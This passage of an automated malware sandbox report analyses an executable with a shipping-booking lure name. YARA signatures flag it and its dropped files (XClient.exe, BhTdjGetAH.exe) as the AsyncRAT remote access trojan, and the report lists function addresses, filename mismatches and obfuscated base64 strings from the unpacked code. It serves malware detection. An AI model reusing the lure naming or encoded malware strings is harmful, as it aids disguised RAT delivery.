Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F4F48	28_2_050F4F48
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F4B10	28_2_050F4B10
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050FBA58	28_2_050FBA58
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F6AB0	28_2_050F6AB0
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F6AC0	28_2_050F6AC0
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_056FF708	28_2_056FF708
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_056FD3D0	28_2_056FD3D0
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 31_2_02851958	31_2_02851958
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_010BD4FC	32_2_010BD4FC
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A746D8	32_2_04A746D8
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A74F37	32_2_04A74F37
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A74F48	32_2_04A74F48
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A761E8	32_2_04A761E8
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A761D8	32_2_04A761D8
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A76AB0	32_2_04A76AB0
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A76AC0	32_2_04A76AC0
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A7BA58	32_2_04A7BA58
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 32_2_04A74B10	32_2_04A74B10
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 35_2_011C1958	35_2_011C1958

Sample file is different than original file name gathered from version info

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1765774652.00000000011EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1767946178.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClientZZ.exe4 vs FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1780627399.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1772786286.0000000005810000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRT.dll. vs FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1768583328.00000000040AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4215493067.0000000005E39000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Binary or memory string: OriginalFilenamepnKa.exe0 vs FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Uses 32bit PE files

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 11.2.BhTdjGetAH.exe.288d464.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.BhTdjGetAH.exe.2878b80.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 17.2.BhTdjGetAH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 28.2.XClient.exe.31210c4.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 28.2.XClient.exe.310c7e0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 28.2.XClient.exe.31210c4.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 28.2.XClient.exe.310c7e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.30162b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000011.00000002.1844167553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001C.00000002.2211516335.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000001.00000002.1767946178.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.1839980652.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BhTdjGetAH.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XClient.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	Base64 encoded string: 'm2k5gSTmIhzPm4znwsFffzrOwzrobfXSPmVd3GVK9rNyso5JZvnpmnhhdL11CtMo', 'N4lkYxT4LErJTkWGpGt0vCx1jBGOxNNewRfEgQRcqLSv1fYqfZzbChhV6hgQPvv4', 'IM25v3IxAKIUFCxT0p8XpiMrmCMGIo1yfVUWBubUjRN1RA7vLbZYOU0NU98OrMqB', 'tOZdjrHFkgp2ItHkswytwMo7ddHAv0SoytCZ4XngZzdcgYSQDWPwb6HI8fNPEDmy', 'nIqjbvAxXyQjXNJqWC1fx8Fyyhtxuh78kr9XG6JjqtCPKfL1WHhjtL3T5EMYW3uv', 'iwjkCLTqhhRVsXgr3TSvogxuJT2UTDmulBoVrKox4wwlpkpGCamQ1jU21zicx2BQ', 'v7PCnjmeJf1Je09wrxnxQfYlvakram1RJ8F2veORWSBJxi2NNdGyt9AmxPagvAkf', 'ZcEvnHx7gftoiSgfjNAIbkE4HcJjPQNyHEmJ2h7GYLnwKDo1zJN3ndBXySvsdMfb', 'IksIdvQ9tF6Z0TaMZCVLthFPpJotDItRbRwfMNnNH1t4MeuP6QLjprRA51RPE5OW', 'ZEFmBjHo7FPYuvClPctfIaJD7dRGvsp6JMPu5RYWD87q4A8wsDmrD5t5P2eDmOJM'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	Base64 encoded string: 'goA6MFBdtLv2MnASz7Og6mNYiP7F2CpDSlvILGQA4NSipUxVOcLyUSwUwwhvzlbP', 'Gp1OKP57uVSp3wHpW3qMGefpA8IXbKdrLlTUGB8NkK3WKbxQzF1oV9VA2ZqUYofO'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Base64 encoded string: 'lSXrhVajXFbEWoQVRTEqxDHpEXPMcLtYdlNxLHUVcnPh5HA8iQPpWfS55xqhkKbNlX1OkzpgMozx9krFhTw9iwGJIoE1IZ2y', 'Y1MOWbSIwsQFsk6Lb3f7KGug0tskQtL9qXizQeQ7RA3TZDsp3pUIxfiIitu75Z6gxuIN46raAZogiPaxZFe1csKsHbtLG4SO'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	Base64 encoded string: 'hCpqCsXGdaTKHVckUTmhc9kJuWCZQRqHEz034dhCu4zmXFd16KsjcJYMKamy7Rft'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	Base64 encoded string: 'woNHpHGmMwsIKEw8ntBHKVHMhgWt0IXHmDRuldTtE1IY29APaKSBj3tt3vhKc4P7', 'SZZKT3ZI0GkfL2iAzaAIY56PUEnPP34j3knTr6UXpDeJ8PE3Nrxc04Yr9rvkIbhU'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Base64 encoded string: 'GbnSte7UnD1dvquteW4lli16wRYkhufDz0HFxZAO57ZxLbKwJwhteyRiVHkz5OPplyHSYBI1pMJ2bg1bQsDscAGOdU5BXhm2', 'IQmCUlmrVabVchmitrwHYEqhjhEBPupNZBABZHHamCWHZxjZL9DtFqy5EvRllDKA62Ca72h2wxnuVK26CQ8WEaLNzlWvlJoN', 'Qz8K2Ku7fNSV9ARr09HTwaYJRaB4k09kaeFSC4oyqn3Y5oJQxVxkLk4NKjjboSa6hcqCNhwAax1i6Kxabuc26jJW9GkTpk76', 'HsBMl0O4B3Po0QfGFQt7VMpCQc8eOh3DfMLJsXpDHr3Oq1HrBTOm5mvypsZwMsrjftcH46DbCbxmlTa1lSTGEfA1zIPHxWL0', 'lby38UhbIih3cyseFESJFZIKOZLT1pSgyQscTRatCbz9fmilgpzhSacInKhkHpGjit7KCWu4AuRPNQFfwkzrfrFZEbs9m5cp', 'mTrGfa7c1ILSIYHRdRT0oxUuP2LhOEbt2JmT01hXlSSpAScubVxNgz3WA2hZ82VPjWPe8uDzGKjbI497tZP51R5BO3k4ioux', 'Jr76SJ0aVIfGTUYUDh5k8xCOn3lX5d85aGNZ8QkGWWya3z5GLeYXmXYDQTV7iqiUXeFLhwUCo4ZI5LDoPSHfXusAxbEo8old', 'lGIIkWu5VZ4lZoN9VE5L3BpNYKrQJnGl7KUraq9hD6jtevDzFNBsNaSlWSvKvIgHLchV9tP9Dx6uWpQVg035lKVTlR1DA8au', 'yc4TDGZ1oVJhiembMwlhvuInenZcFJFty5N9Vu2t9ZekWoaC9ggEfBFCI7sgQBulRyrit0Y5k10a2ya8n4QvGpQhL27F4ghL', 'xAc6fMXprV2rbR7NoiGOyVwZgFq0f8J0MbFehJ7GjR5hm8poIK5zE1X0Kqg9Eg4BMo5rX5bgyzTd5dPirUSxOMQBnQTEeGbJ', 'IR6v0s2ohF08HKGITgv7NwNzJELJhn1fEB49703FC6Oijgr95ofEcYTmUEoQWFBAo51RhVCNA90JuQlphCBn8EO4wt0aBe56'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	Base64 encoded string: 'm2k5gSTmIhzPm4znwsFffzrOwzrobfXSPmVd3GVK9rNyso5JZvnpmnhhdL11CtMo', 'N4lkYxT4LErJTkWGpGt0vCx1jBGOxNNewRfEgQRcqLSv1fYqfZzbChhV6hgQPvv4', 'IM25v3IxAKIUFCxT0p8XpiMrmCMGIo1yfVUWBubUjRN1RA7vLbZYOU0NU98OrMqB', 'tOZdjrHFkgp2ItHkswytwMo7ddHAv0SoytCZ4XngZzdcgYSQDWPwb6HI8fNPEDmy', 'nIqjbvAxXyQjXNJqWC1fx8Fyyhtxuh78kr9XG6JjqtCPKfL1WHhjtL3T5EMYW3uv', 'iwjkCLTqhhRVsXgr3TSvogxuJT2UTDmulBoVrKox4wwlpkpGCamQ1jU21zicx2BQ', 'v7PCnjmeJf1Je09wrxnxQfYlvakram1RJ8F2veORWSBJxi2NNdGyt9AmxPagvAkf', 'ZcEvnHx7gftoiSgfjNAIbkE4HcJjPQNyHEmJ2h7GYLnwKDo1zJN3ndBXySvsdMfb', 'IksIdvQ9tF6Z0TaMZCVLthFPpJotDItRbRwfMNnNH1t4MeuP6QLjprRA51RPE5OW', 'ZEFmBjHo7FPYuvClPctfIaJD7dRGvsp6JMPu5RYWD87q4A8wsDmrD5t5P2eDmOJM'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	Base64 encoded string: 'goA6MFBdtLv2MnASz7Og6mNYiP7F2CpDSlvILGQA4NSipUxVOcLyUSwUwwhvzlbP', 'Gp1OKP57uVSp3wHpW3qMGefpA8IXbKdrLlTUGB8NkK3WKbxQzF1oV9VA2ZqUYofO'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Base64 encoded string: 'lSXrhVajXFbEWoQVRTEqxDHpEXPMcLtYdlNxLHUVcnPh5HA8iQPpWfS55xqhkKbNlX1OkzpgMozx9krFhTw9iwGJIoE1IZ2y', 'Y1MOWbSIwsQFsk6Lb3f7KGug0tskQtL9qXizQeQ7RA3TZDsp3pUIxfiIitu75Z6gxuIN46raAZogiPaxZFe1csKsHbtLG4SO'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	Base64 encoded string: 'hCpqCsXGdaTKHVckUTmhc9kJuWCZQRqHEz034dhCu4zmXFd16KsjcJYMKamy7Rft'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	Base64 encoded string: 'woNHpHGmMwsIKEw8ntBHKVHMhgWt0IXHmDRuldTtE1IY29APaKSBj3tt3vhKc4P7', 'SZZKT3ZI0GkfL2iAzaAIY56PUEnPP34j3knTr6UXpDeJ8PE3Nrxc04Yr9rvkIbhU'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Base64 encoded string: 'GbnSte7UnD1dvquteW4lli16wRYkhufDz0HFxZAO57ZxLbKwJwhteyRiVHkz5OPplyHSYBI1pMJ2bg1bQsDscAGOdU5BXhm2', 'IQmCUlmrVabVchmitrwHYEqhjhEBPupNZBABZHHamCWHZxjZL9DtFqy5EvRllDKA62Ca72h2wxnuVK26CQ8WEaLNzlWvlJoN', 'Qz8K2Ku7fNSV9ARr09HTwaYJRaB4k09kaeFSC4oyqn3Y5oJQxVxkLk4NKjjboSa6hcqCNhwAax1i6Kxabuc26jJW9GkTpk76', 'HsBMl0O4B3Po0QfGFQt7VMpCQc8eOh3DfMLJsXpDHr3Oq1HrBTOm5mvypsZwMsrjftcH46DbCbxmlTa1lSTGEfA1zIPHxWL0', 'lby38UhbIih3cyseFESJFZIKOZLT1pSgyQscTRatCbz9fmilgpzhSacInKhkHpGjit7KCWu4AuRPNQFfwkzrfrFZEbs9m5cp', 'mTrGfa7c1ILSIYHRdRT0oxUuP2LhOEbt2JmT01hXlSSpAScubVxNgz3WA2hZ82VPjWPe8uDzGKjbI497tZP51R5BO3k4ioux', 'Jr76SJ0aVIfGTUYUDh5k8xCOn3lX5d85aGNZ8QkGWWya3z5GLeYXmXYDQTV7iqiUXeFLhwUCo4ZI5LDoPSHfXusAxbEo8old', 'lGIIkWu5VZ4lZoN9VE5L3BpNYKrQJnGl7KUraq9hD6jtevDzFNBsNaSlWSvKvIgHLchV9tP9Dx6uWpQVg035lKVTlR1DA8au', 'yc4TDGZ1oVJhiembMwlhvuInenZcFJFty5N9Vu2t9ZekWoaC9ggEfBFCI7sgQBulRyrit0Y5k10a2ya8n4QvGpQhL27F4ghL', 'xAc6fMXprV2rbR7NoiGOyVwZgFq0f8J0MbFehJ7GjR5hm8poIK5zE1X0Kqg9Eg4BMo5rX5bgyzTd5dPirUSxOMQBnQTEeGbJ', 'IR6v0s2ohF08HKGITgv7NwNzJELJhn1fEB49703FC6Oijgr95ofEcYTmUEoQWFBAo51RhVCNA90JuQlphCBn8EO4wt0aBe56'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	Base64 encoded string: 'm2k5gSTmIhzPm4znwsFffzrOwzrobfXSPmVd3GVK9rNyso5JZvnpmnhhdL11CtMo', 'N4lkYxT4LErJTkWGpGt0vCx1jBGOxNNewRfEgQRcqLSv1fYqfZzbChhV6hgQPvv4', 'IM25v3IxAKIUFCxT0p8XpiMrmCMGIo1yfVUWBubUjRN1RA7vLbZYOU0NU98OrMqB', 'tOZdjrHFkgp2ItHkswytwMo7ddHAv0SoytCZ4XngZzdcgYSQDWPwb6HI8fNPEDmy', 'nIqjbvAxXyQjXNJqWC1fx8Fyyhtxuh78kr9XG6JjqtCPKfL1WHhjtL3T5EMYW3uv', 'iwjkCLTqhhRVsXgr3TSvogxuJT2UTDmulBoVrKox4wwlpkpGCamQ1jU21zicx2BQ', 'v7PCnjmeJf1Je09wrxnxQfYlvakram1RJ8F2veORWSBJxi2NNdGyt9AmxPagvAkf', 'ZcEvnHx7gftoiSgfjNAIbkE4HcJjPQNyHEmJ2h7GYLnwKDo1zJN3ndBXySvsdMfb', 'IksIdvQ9tF6Z0TaMZCVLthFPpJotDItRbRwfMNnNH1t4MeuP6QLjprRA51RPE5OW', 'ZEFmBjHo7FPYuvClPctfIaJD7dRGvsp6JMPu5RYWD87q4A8wsDmrD5t5P2eDmOJM'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	Base64 encoded string: 'goA6MFBdtLv2MnASz7Og6mNYiP7F2CpDSlvILGQA4NSipUxVOcLyUSwUwwhvzlbP', 'Gp1OKP57uVSp3wHpW3qMGefpA8IXbKdrLlTUGB8NkK3WKbxQzF1oV9VA2ZqUYofO'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	Base64 encoded string: 'lSXrhVajXFbEWoQVRTEqxDHpEXPMcLtYdlNxLHUVcnPh5HA8iQPpWfS55xqhkKbNlX1OkzpgMozx9krFhTw9iwGJIoE1IZ2y', 'Y1MOWbSIwsQFsk6Lb3f7KGug0tskQtL9qXizQeQ7RA3TZDsp3pUIxfiIitu75Z6gxuIN46raAZogiPaxZFe1csKsHbtLG4SO'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	Base64 encoded string: 'hCpqCsXGdaTKHVckUTmhc9kJuWCZQRqHEz034dhCu4zmXFd16KsjcJYMKamy7Rft'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	Base64 encoded string: 'woNHpHGmMwsIKEw8ntBHKVHMhgWt0IXHmDRuldTtE1IY29APaKSBj3tt3vhKc4P7', 'SZZKT3ZI0GkfL2iAzaAIY56PUEnPP34j3knTr6UXpDeJ8PE3Nrxc04Yr9rvkIbhU'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Base64 encoded string: 'GbnSte7UnD1dvquteW4lli16wRYkhufDz0HFxZAO57ZxLbKwJwhteyRiVHkz5OPplyHSYBI1pMJ2bg1bQsDscAGOdU5BXhm2', 'IQmCUlmrVabVchmitrwHYEqhjhEBPupNZBABZHHamCWHZxjZL9DtFqy5EvRllDKA62Ca72h2wxnuVK26CQ8WEaLNzlWvlJoN', 'Qz8K2Ku7fNSV9ARr09HTwaYJRaB4k09kaeFSC4oyqn3Y5oJQxVxkLk4NKjjboSa6hcqCNhwAax1i6Kxabuc26jJW9GkTpk76', 'HsBMl0O4B3Po0QfGFQt7VMpCQc8eOh3DfMLJsXpDHr3Oq1HrBTOm5mvypsZwMsrjftcH46DbCbxmlTa1lSTGEfA1zIPHxWL0', 'lby38UhbIih3cyseFESJFZIKOZLT1pSgyQscTRatCbz9fmilgpzhSacInKhkHpGjit7KCWu4AuRPNQFfwkzrfrFZEbs9m5cp', 'mTrGfa7c1ILSIYHRdRT0oxUuP2LhOEbt2JmT01hXlSSpAScubVxNgz3WA2hZ82VPjWPe8uDzGKjbI497tZP51R5BO3k4ioux', 'Jr76SJ0aVIfGTUYUDh5k8xCOn3lX5d85aGNZ8QkGWWya3z5GLeYXmXYDQTV7iqiUXeFLhwUCo4ZI5LDoPSHfXusAxbEo8old', 'lGIIkWu5VZ4lZoN9VE5L3BpNYKrQJnGl7KUraq9hD6jtevDzFNBsNaSlWSvKvIgHLchV9tP9Dx6uWpQVg035lKVTlR1DA8au', 'yc4TDGZ1oVJhiembMwlhvuInenZcFJFty5N9Vu2t9ZekWoaC9ggEfBFCI7sgQBulRyrit0Y5k10a2ya8n4QvGpQhL27F4ghL', 'xAc6fMXprV2rbR7NoiGOyVwZgFq0f8J0MbFehJ7GjR5hm8poIK5zE1X0Kqg9Eg4BMo5rX5bgyzTd5dPirUSxOMQBnQTEeGbJ', 'IR6v0s2ohF08HKGITgv7NwNzJELJhn1fEB49703FC6Oijgr95ofEcYTmUEoQWFBAo51RhVCNA90JuQlphCBn8EO4wt0aBe56'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	Base64 encoded string: 'm2k5gSTmIhzPm4znwsFffzrOwzrobfXSPmVd3GVK9rNyso5JZvnpmnhhdL11CtMo', 'N4lkYxT4LErJTkWGpGt0vCx1jBGOxNNewRfEgQRcqLSv1fYqfZzbChhV6hgQPvv4', 'IM25v3IxAKIUFCxT0p8XpiMrmCMGIo1yfVUWBubUjRN1RA7vLbZYOU0NU98OrMqB', 'tOZdjrHFkgp2ItHkswytwMo7ddHAv0SoytCZ4XngZzdcgYSQDWPwb6HI8fNPEDmy', 'nIqjbvAxXyQjXNJqWC1fx8Fyyhtxuh78kr9XG6JjqtCPKfL1WHhjtL3T5EMYW3uv', 'iwjkCLTqhhRVsXgr3TSvogxuJT2UTDmulBoVrKox4wwlpkpGCamQ1jU21zicx2BQ', 'v7PCnjmeJf1Je09wrxnxQfYlvakram1RJ8F2veORWSBJxi2NNdGyt9AmxPagvAkf', 'ZcEvnHx7gftoiSgfjNAIbkE4HcJjPQNyHEmJ2h7GYLnwKDo1zJN3ndBXySvsdMfb', 'IksIdvQ9tF6Z0TaMZCVLthFPpJotDItRbRwfMNnNH1t4MeuP6QLjprRA51RPE5OW', 'ZEFmBjHo7FPYuvClPctfIaJD7dRGvsp6JMPu5RYWD87q4A8wsDmrD5t5P2eDmOJM'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	Base64 encoded string: 'goA6MFBdtLv2MnASz7Og6mNYiP7F2CpDSlvILGQA4NSipUxVOcLyUSwUwwhvzlbP', 'Gp1OKP57uVSp3wHpW3qMGefpA8IXbKdrLlTUGB8NkK3WKbxQzF1oV9VA2ZqUYofO'
